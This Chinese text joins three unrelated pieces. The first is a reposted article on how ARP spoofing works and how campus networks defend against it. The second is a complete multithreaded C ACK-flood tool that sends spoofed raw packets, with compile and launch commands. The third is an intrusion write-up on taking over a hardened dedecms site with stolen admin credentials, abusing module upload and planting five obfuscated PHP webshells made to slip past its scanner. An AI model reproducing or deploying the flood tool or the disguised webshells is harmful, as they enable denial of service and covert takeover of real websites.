本文介绍了 ARP攻击的原理以及由此引发的网络安全问题，并且结合实际情况，提出在校园网中实施多层次的防范方法，以解决因ARP攻击而引发的网络安全问题，最后介绍了一些实用性较强且操作简单的检测和抵御攻击的有效方法。     您是否遇到局域网内频繁性区域或整体掉线，重启计算机或网络设备后恢复正常？您的网速是否时快时慢，极其不稳定，但单机进行光纤数据测试时一切正常？您是否时常听到教职工的网上银行、游戏及QQ账号频繁丢失的消息？……     这些问题的出现有很大一部分要归功于ARP攻击，据检测数据显示，APR攻击从未停止过，为此有效的防范ARP形式的网络攻击已成为确保网络畅通必要条件。 1、什么是ARP？     ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢？它就是通过地址解析协议获得的。     所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。     在局域网中，通过ARP协议来完成IP地址转换为第二层物理地址（即MAC地址）的，ARP协议对网络安全具有重要的意义。 2、ARP协议的工作原理     正常情况下，每台主机都会在自己的ARP缓冲区中建立一个 ARP列表，以表示IP地址和MAC地址的对应关系。主机需要将一个数据包要发送到目的主机时，会首先检查自己 ARP列表中是否存在该 IP地址对应的MAC地址，如果有﹐就直接将数据包发送到这个MAC地址；     如果没有，就向本地网段发起一个ARP请求的广播包，查询此目的主机对应的MAC地址。此ARP请求数据包里包括源主机的IP地址、硬件地址、以及目的主机的IP地址。网络中所有的主机收到这个ARP请求后，会检查数据包中的目的IP是否和自己的IP地址一致。     如果不相同就忽略此数据包；如果相同，该主机首先将发送端的MAC地址和IP地址添加到自己的ARP列表中，如果ARP表中已经存在该IP的信息，则将其覆盖，然后给源主机发送一个 ARP响应数据包，告诉对方自己是它需要查找的MAC地址；源主机收到这个ARP响应数据包后，将得到的目的主机的IP地址和MAC地址添加到自己的ARP列表中，并利用此信息开始数据的传输。 1. 要发送网络包给192.168.1.1，但不知MAC地址？ 2. 在局域网发出广播包“192.168.1.1的MAC地址是什么？” 3. 其他机器不回应，只有192.168.1.1回应“192.168.1.1的MAC地址是00-aa-00-62-c6-09”   从上面可以看出，ARP协议的基础就是信任局域网内所有的人，那么就很容易实现在以太网上的ARP欺骗。更何况ARP协议是工作在更低于IP协议的协议层，因此它的危害就更加隐蔽。 二、ARP欺骗的原理     ARP类型的攻击最早用于盗取密码之用，网内中毒电脑可以伪装成路由器，盗取用户的密码， 后来发展成内藏于软件，扰乱其他局域网用户正常的网络通信，下面我们简要阐述ARP欺骗的原理：假设这样一个网络，一个交换机连接了3台机器，依次是计算机A，B，C     A的地址为：IP：192.168.1.1 MAC: AA-AA-AA-AA-AA-AA     B的地址为：IP：192.168.1.2 MAC: BB-BB-BB-BB-BB-BB     C的地址为：IP：192.168.1.3 MAC: CC-CC-CC-CC-CC-CC 第二步：正常情况下在A计算机上运行ARP -A查询ARP缓存表应该出现如下信息。     Interface: 192.168.1.1 on Interface 0x1000003     Internet Address Physical Address Type     192.168.1.3 CC-CC-CC-CC-CC-CC dynamic 第三步：在计算机B上运行ARP欺骗程序，来发送ARP欺骗包。     B向A发送一个自己伪造的ARP应答，而这个应答中的数据为发送方IP地址是192.168.1.3（C的IP地址），MAC地址是DD-DD-DD-DD-DD-DD（C的MAC地址本来应该是CC-CC-CC-CC-CC-CC，这里被伪造了）。当A接收到B伪造的ARP应答，就会更新本地的ARP缓存（A可不知道被伪造了）。而且A不知道其实是从B发送过来的，A这里只有192.168.1.3（C的IP地址）和无效的DD-DD-DD-DD-DD-DD MAC地址。 第四步：欺骗完毕我们在A计算机上运行ARP -A来查询ARP缓存信息。你会发现原来正确的信息现在已经出现了错误。     Interface: 192.168.1.1 on Interface 0x1000003     Internet Address Physical Address Type     192.168.1.3 DD-DD-DD-DD-DD-DD dynamic 上面例子中在计算机A上的关于计算机C的MAC地址已经错误了，所以即使以后从A计算机访问C计算机这个192.168.1.3这个地址也会被ARP协议错误的解析成MAC地址为DD-DD-DD-DD-DD-DD的。     当局域网中一台机器，反复向其他机器，特别是向网关，发送这样无效假冒的ARP应答信息包时，严重的网络堵塞就会开始。由于网关MAC地址错误，所以从网络中计算机发来的数据无法正常发到网关，自然无法正常上网。 这就造成了无法访问外网的问题，另外由于很多时候网关还控制着我们的局域网LAN上网，所以这时我们的LAN访问也就出现问题了。 三、ARP欺骗的危害     ARP类型的攻击在校园网中最早出现在去年5月份，目前校园网内的计算机所感染的“ARP欺骗”系列病毒已经有了几十个变种。根据这些变种的工作特点和外部特性大概可以分为三大类，其中“ARP欺骗”和“恶意窃听”两类对学校局域网的正常运行和网络用户的信息安全的威胁最大。     ARP攻击只要一开始就造成局域网内计算机无法和其他计算机进行通讯，而且网络对此种病毒没有任何耐受度，只要局域网中存在一台感染“ARP欺骗”病毒的计算机将会造成整个局域网通讯中断。     “恶意窃听”病毒是“ARP欺骗”系列病毒中影响和危害最为恶劣的。它不会造成局域网的中断，仅仅会使网络产生较大的延时，但是中毒主机会截取局域网内所有的通讯数据，并向特定的外网用户发送所截获的数据，对局域网用户的网络使用造成非常非常严重的影响，直接威胁着局域网用户自身的信息安全。 四、出现ARP攻击的原因及特征     一个正常运行的局域网是不应该出现ARP攻击的，经过长时间的观测，发现ARP攻击的出现主要是由以下几个原因造成的： 1、人为破坏     主要是内网有人安装了P2P监控软件，如P2P终结者，网络执法官，聚生网管，QQ第六感等，恶意监控其他机器，限制流量，或者进行内网DDOS攻击。 2、木马病毒     传奇、跑跑卡丁车、劲舞团等游戏外挂，如：及时雨PK版，跑跑牛车，劲舞小生等，他内含一些木马程序，也会引起ARP欺骗。     其实真正有人恶意捣乱的是很少的，一次两次捣乱，次数多了自己也就腻了，更何况事后网管肯定会找到捣乱的主机，所以说人为破坏是比较好解决的。最麻烦的就是使用带木马的游戏外挂和浏览带有恶意代码的网页。     当出现ARP攻击后最明显的特征是网络频繁掉线，速度变慢，查看进程你会发现增加了 down.exe 1.exe cmd.exe 9sy.exe中的任意一个或多个，严重的还能自动还下载威金病毒，logo_1.exe.rundl132.exe，感染可执行文件，图标变花还。 五、常用的防范方法     目前ARP系列的攻击方式和手段多种多样，因此还没有一个绝对全面有效的防范方法。从实践经验看最为有效的防范方法即打全Windows的补丁、正确配置和使用网络防火墙、安装防病毒软件并及时更新病毒库。     对于Windows补丁不仅仅打到SP2（XP）或SP4（2000），其后出现的所有安全更新也都必须及时打全才能最大限度的防范病毒和木马的袭击。此外，正确使用U盘等移动存储设备，防止通过校外计算机传播病毒和木马。 下面介绍防范ARP攻击的几种常用方法： 1、静态绑定     将IP和MAC静态绑定，在网内把主机和网关都做IP和MAC绑定。     欺骗是通过ARP的动态实时的规则欺骗内网机器，所以我们把ARP全部设置为静态可以解决对内网PC的欺骗，同时在网关也要进行IP和MAC的静态绑定，这样双向绑定才比较保险。缺点是每台电脑需绑定，且重启后任需绑定，工作量较大，虽说绑定可以通过批处理文件来实现，但也比较麻烦。 2、使用防护软件     目前关于ARP类的防护软件出的比较多了，我校常用的一款软件是彩影软件的ARP防火墙.     ARP防火墙采用系统内核层拦截技术和主动防御技术，包含六大功能模块可解决大部分欺骗、ARP攻击带来的问题，从而保证通讯安全（保障通讯数据不被网管软件/恶意软件监听和控制）、保证网络畅通。 3、具有ARP防护功能的网络设备     由于ARP形式的攻击而引发的网络问题是目前网络管理，特别是局域网管理中最让人头疼的攻击，他的攻击技术含量低，随便一个人都可以通过攻击软件来完成ARP欺骗攻击，同时防范ARP形式的攻击也没有什么特别有效的方法。目前只能通过被动的亡羊补牢形式的措施了，本文介绍的方法希望对大家有所帮助。 转自网络

ack flood攻击同样是利用TCP三次握手的缺陷实现的攻击， ack flood攻击利用的是三次握手的第二段，也就是TCP标志位syn和ack都置1，攻击主机伪造海量的 虚假ack包发送给目标主机，目标主机每收到一个带有 ack标志位的数据包时，都会去自己的TCP连接表中查看有没有与ack的发送者建立连接 ，如果有则发送三次握手的第三段ack+seq完成三次握手，成功 建立TCP连接。如果没有则发送ack+rst 断开连接。但是在这个过程中会消耗一定的CUP计算资源，如果瞬间 收到海量的syn+ack数据包将会 消耗大量的cpu资源使得正常的连接无法建立或者增加延迟，甚至造成服务器瘫痪、死机。 理论上目标主机的TCP连接越多ack攻击效果越好，所以如果syn flood与ack flood配合使用效果会更明显。下面的代码采用多线程威力非常大，仅供测试，切勿非法使用，实现代码如下（后面有已编译的脚本直接可用）：/* * ack code author:minet */ #include <unistd.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <pthread.h> #include <netinet/tcp.h> #include <netinet/ip.h> #include <netinet/in.h> #include <netinet/if_ether.h> #include <netdb.h> #include <net/if.h> #include <arpa/inet.h> #define MAX_PACKET_SIZE 65534 #define PHI 0x9e3779b9 static unsigned long int Q[4096], c = 362436; volatile int limiter; volatile unsigned int pps; volatile unsigned int sleeptime = 100; void init_rand(unsigned long int x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } } unsigned long int rand_cmwc(void) { unsigned long long int t, a = 18782LL; static unsigned long int i = 4095; unsigned long int x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } unsigned short csum (unsigned short *buf, int count) { register unsigned long sum = 0; while( count > 1 ) { sum += *buf++; count -= 2; } if(count > 0) { sum += *(unsigned char *)buf; } while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); } return (unsigned short)(~sum); } unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { struct tcp_pseudo { unsigned long src_addr; unsigned long dst_addr; unsigned char zero; unsigned char proto; unsigned short length; } pseudohead; unsigned short total_len = iph->tot_len; pseudohead.src_addr=iph->saddr; pseudohead.dst_addr=iph->daddr; pseudohead.zero=0; pseudohead.proto=IPPROTO_TCP; pseudohead.length=htons(sizeof(struct tcphdr)); int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr); unsigned short *tcp = malloc(totaltcp_len); memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo)); memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr)); unsigned short output = csum(tcp,totaltcp_len); free(tcp); return output; } void setup_ip_header(struct iphdr *iph) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr); iph->id = htonl(54321); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = 6; iph->check = 0; iph->saddr = inet_addr("192.168.3.100"); } void setup_tcp_header(struct tcphdr *tcph) { tcph->source = rand(); tcph->seq = rand(); tcph->ack_seq = rand(); tcph->res2 = 0; tcph->doff = 5; tcph->ack = 1; tcph->window = rand(); tcph->check = 0; tcph->urg_ptr = 0; } void *flood(void *par1) { char *td = (char *)par1; char datagram[MAX_PACKET_SIZE]; struct iphdr *iph = (struct iphdr *)datagram; struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr); struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = rand(); sin.sin_addr.s_addr = inet_addr(td); int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(s < 0){ fprintf(stderr, "无法打开原始套接字..\n"); exit(-1); } memset(datagram, 0, MAX_PACKET_SIZE); setup_ip_header(iph); setup_tcp_header(tcph); tcph->dest = rand(); iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len); int tmp = 1; const int *val = &tmp; if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ fprintf(stderr, "无法设置HDRINCL..\n"); exit(-1); } init_rand(time(NULL)); register unsigned int i; i = 0; while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF); iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len); tcph->seq = rand_cmwc() & 0xFFFF; tcph->source = htons(rand_cmwc() & 0xFFFF); tcph->check = 0; tcph->check = tcpcsum(iph, tcph); pps++; if(i >= limiter) { i = 0; usleep(sleeptime); } i++; } } int main(int argc, char *argv[ ]) { if(argc < 5){ fprintf(stderr, "请按照格式输入正确的参数\n"); fprintf(stdout, "启动格式: %s <目标IP> <线程数量> <流量限制/-1为不限制/填-1即可> <攻击时间/按照秒计时>\n", argv[0]); exit(-1); } fprintf(stdout, "设置套接字…\n"); int num_threads = atoi(argv[2]); int maxpps = atoi(argv[3]); limiter = 0; pps = 0; pthread_t thread[num_threads]; int multiplier = 100; int i; for(i = 0;i<num_threads;i++){ pthread_create( &thread[i], NULL, &flood, (void *)argv[1]); } fprintf(stdout, "开始攻击..\n"); for(i = 0;i<(atoi(argv[4])*multiplier);i++) { usleep((1000/multiplier)*1000); if((pps*multiplier) > maxpps) { if(1 > limiter) { sleeptime+=100; } else { limiter--; } } else { limiter++; if(sleeptime > 25) { sleeptime-=25; } else { sleeptime = 0; } } pps = 0; } return 0; }将脚本上传到服务器，然后编译使用以下命令对源代码进行编译gcc 脚本名称.c -o 脚本名称 -lpthread或者gcc 脚本名称.c -lpthread -lpcap -o 脚本名称编译完成后需要对该脚本赋予足够的权限chmod 755 脚本名称然后即可开始测试，输入命令./ack 目标IP 线程数量 流量限制/-1为不限制/填-1即可 攻击时间/按照秒计时， 例如：./ack 127.0.0.1 10 -1 300 

需要对一个使用dedecms搭建的网站进行一次渗透，对方的网站的防护人员具有一定的安全意识，已经在很多的敏感的地方进行了加固，常见的dedecms漏洞都已经修复了，常见的可能存在的漏洞模块也被清除了，网站也是不是在godaday上面。而我目前的信息是知道了后台的登录地址，管理员的账号密码。最终的目的就是要求这个网站无法访问。信息收集使用管理员的账号登陆到后台页面进行查看，发现防护人员删除了 文件管理模块 ，这里的删除指的是防护人员是直接删除了文件管理员模块对应的那几个文件，而不是在dedecms后台上面的删除，因为我当时想通过直接安装文件管理模块时失败了。通过在后台页面进行查看，发现这个网站之前已经被人种马了，但是管理员是直接不启用这个php文件。通过分析，我认为管理员可能通过删除物理文件的方式已经将很多的文件进行了删除。我们已经进入了后台，而且虚拟主机很难提权，那么我们想的是通过在网站中布置大量的木马，让网站在我的控制之下。那么此时就需要知道目前还有那些文件是可以访问的，就写了下面一个简单的diff脚本。import argparse import os from urllib.parse import urljoin import requests # import os.path # 程序没有使用协程，速度略慢 def access(url): headers = { 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36', } response = requests.get(url,headers=headers) return response.status_code == requests.codes.ok # def get_access(files,baseurl): can_access_files= [] for file in files: url = urljoin(baseurl,file) print(url) canaccess = access(url) if canaccess: can_access_files.append(file) return can_access_files # 得到了本地所有的文件 def get_local_files(filepath): # 遍历本地所有的文件 files = [] for parent,dirnames,filenames in os.walk(filepath): for filename in filenames: abspath = os.path.join(parent,filename) # 得到文件的后缀 file_suffix = os.path.splitext(os.path.basename(abspath))[1][1:] if file_suffix in suffix: relativepath = os.path.relpath(abspath,filepath) files.append(relativepath) return files def main(filepath,local,remote,suffix): files = get_local_files(filepath) files = [file.replace('\\','/')for file in files] local_access_files = get_access(files,local) local_access_files = [file.replace('\\','/')for file in local_access_files] remote_access_files = get_access(local_access_files,remote) urls = [urljoin(remote,file) for file in remote_access_files] urls_str = '\r'.join(urls) with open('urls.txt','w') as file: file.write(urls_str) print('运行完毕') if __name__ == '__main__': parser = argparse.ArgumentParser(description='dedecms diff') parser.add_argument('-f', '--file',required=True, dest='localfile', action='store', help='the dedecms local file') parser.add_argument('-l', '--local',required=True, dest='local', action='store', help='the dedecms local host') parser.add_argument('-r', '--remote',required=True, dest='remote', action='store', help='the dedecms remote host') parser.add_argument('-s', '--suffix',default='php', nargs='*', dest='suffix', action='store', help='the file that you want to diff') args = parser.parse_args() filepath = args.localfile local = args.local remote = args.remote suffix = args.suffix main(filepath,local,remote,suffix) 由于目前还是一个单线程的脚本，在访问目标网站的时候，速度会比较慢，后续可能到使用协程的方式来解决速度慢的问题。通过这种方式，就可以知道目前网站的防护人员删除了哪些本可以正常访问的php文件。修复文件管理模块发现虽然网站的防护人员手动删除了dedecms的文件上传模块，但是我可以通过手动上传一个打包的文件上传模块上去，这样我就可以有一个文件上传模块，这样就可以做很多的事了。在上传模块的时候，有一点需要注意的地方是在于，在导出模块的时候，需要选择导出的文件名，此时需要修改文件名，否则就会和已知的文件名相重复，这个比较难以描述，但是大家实际动手操作一边就知道了。在本地打包好了文件管理模块进行安装时，发现需要安装文件管理模块的目录没有写入权限，那么说明就无法通过这种方式来安装文件管理模块。如果无法上传文件管理模块，那么其他的后续操作都无法进行了。dedecms文件上传模块分析其实上传的dedecms的文件模块就是一个xml文件，观察xml的格式如下：<module> <oldfilelist> file_manage_control2.php file_manage_main2.php file_manage_view2.php file_pic_view2.php templets/file_edit2.htm templets/file_manage_main2.htm templets/file_pic_view2.htm </oldfilelist> </systemfile> <modulefiles> <file type='file' name='file_manage_control2.php'> 对应的file_manage_control2.php文件中的代码的base64decode </file> ....... 上面显示的就是部分xml文件格式代码从中可以看到 <oldfilelist> 中就声明了模块所需要的所有的文件，同时还表明了文件的路径。那么对于默认的路径无法进行写入，我就尝试其他的目录是否具有写入权限，修改的方式也很简单。<module> <oldfilelist> /uploads/allimg/test.php </oldfilelist> </systemfile> <modulefiles> <file type='file' name='test.php'> 对应的file_manage_control2.php文件中的代码的base64decode </file> ....... 经过测试可以在dedecms中的 uploads/allimg 可以进行写入。那么具有写入权限，这样我们就可以写入一句话木马和大马了。写入木马我首先在 uploads/allimg 下放置了一个大马。这样就可以通过大马上传文件了，在使用大马上传文件的时候具有写入权限就可以了。本次的目标的最终目的就是要求在网站中尽可能地防止木马，让网站无法正常使用或者是完全处于我的控制一下。由于dedecms自带有一个简单的病毒防护模块，如下图所示：在dedecms中的病毒扫描中会对代码中的 eval|cmd|system|exec|_GET|_POST ,这些进行检测。那么这就要求我们的一句话木马不能含有这些字符，同时还需要像正常的代码文件。因为部分的一句话木马虽然不含有这些关键字，但是网站的防护人员一看就知道这是木马，而不是正常的代码。说了这么多，就是我们的木马具有伪装性。下面就给出了当时我们所使用的一句话木马，由于当时的网站并没有使用盾、狗、锁。所以以下的代码不保证能够防御这些。木马1<?php $uf="snc3"; $ka="IEBldmFbsK"; $pjt="CRfUE9TVF"; $vbl = str_replace("ti","","tistittirti_rtietipltiatice"); $iqw="F6ciddKTs="; $bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); $sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); $tmp = $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw)); $mpy = $sbp('', $tmp); $mpy(); ?> 从这个代码中可以看到，没有看出任何的关键字，但是出现了 str_replace 。下面就对这个一句话木马进行简要的分析$ka.$pjt.$uf.$iqw 组合起来就是 IEBldmFbsKCRfUE9TVFsnc3F6ciddKTs= $vbl 是 str_replace $bkf 是 base64_decode $sbp 是 create_function ,关于create_function参考 create_function那么实际的代码为:$mpy = create_function('', '@eval($_POST['sqzr']);'); $mpy(); 这样就是一个简单的一句话木马了。木马2<?php error_reporting(0); set_time_limit(0); $a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0"); $a(@${"_P"."O"."S"."T"}[xw]); ?> 这个代码也十分的明显了，其中的 $a 最后得到就是 assert ，这个主要是通过 base64_decode 来解决的。同时使用了 error_reporting(0);set_time_limit(0); 来屏蔽出错信息。木马3<?php $adminDirhand=str_replace('f',"","bfafsfef6f4f_fdfefcfofdfe"); $Htmlreplace=str_replace('X','','gXzXiXnXfXlate'); $adminDirhand=($Htmlreplace($adminDirhand("SywuTi0qAQA="))); @$adminDirhand(${"_P"."O"."S"."T"} ['ms']); ?> 这个木马主要是通过 base64_decode 来进行隐藏代码。$adminDirhand 就是 base64_decode $Htmlreplace 是， gzinflate ， gzinflate 是php中的一个压缩方法。那么最后的代码就是$t = gzinflate(base64_decode("SywuTi0qAQA=")) //得到$t是assert assert(${"_P"."O"."S"."T"} ['ms']); 最后木马看起就非常的简单，这个木马主要是结合了 base64_decode 和 gzinflate 。关于 gzinflate 的一句话木马可以看文章， eval(gzinflate(base64_decode解密方法木马4<?php $tmp = base64_decode('W0BldmFsKCRfUE9TVFttc2d1YW5jaGFdKTtd'); @preg_replace("/\[(.*)\]/e",'\\1',$tmp); 这个木马也比较的简单，使用了 preg_replace 中的参数 /e ，这样就可以执行代码了。比较常见的一句话木马，但是这个函数在后面的php版本中已经取消了木马5<?php $cfg_base=chr(99).chr(104).chr(114); $cfg_base_path=$cfg_base(101).$cfg_base(118).$cfg_base(97).$cfg_base(108).$cfg_base(40).$cfg_base(36).$cfg_base(95).$cfg_base(80).$cfg_base(79).$cfg_base(83).$cfg_base(84).$cfg_base(91).$cfg_base(109).$cfg_base(115).$cfg_base(103).$cfg_base(117).$cfg_base(97).$cfg_base(110).$cfg_base(99).$cfg_base(104).$cfg_base(97).$cfg_base(93).$cfg_base(41).$cfg_base(59); $cfg_base_encode=$cfg_base(99).$cfg_base(114).$cfg_base(101).$cfg_base(97).$cfg_base(116).$cfg_base(101).$cfg_base(95).$cfg_base(102).$cfg_base(117).$cfg_base(110).$cfg_base(99).$cfg_base(116).$cfg_base(105).$cfg_base(111).$cfg_base(110); $_=$cfg_base_encode("",$cfg_base_path); @$_(); ?> 这个虽然是一句话木马，但是一看就知道是一句话木马。下面就是对这个一句话木马的简单分析。$cfg_base 是 chr $cfg_base_path 是 eval($_POST[msguancha]); $cfg_base_encode 是 create_function那么最后的一句话木马的格式就是:$tmp = create_function('',`eval($_POST[msguancha]);`); @$tmp(); 这个也主要利用的是 create_function 来创建一句话木马的。上面所有的木马都可以逃过dedecms自带的检测，而且这些代码也不是特别像一句话木马。至于如何插入一句话代码，这个很简单，本篇文章就不作说明了。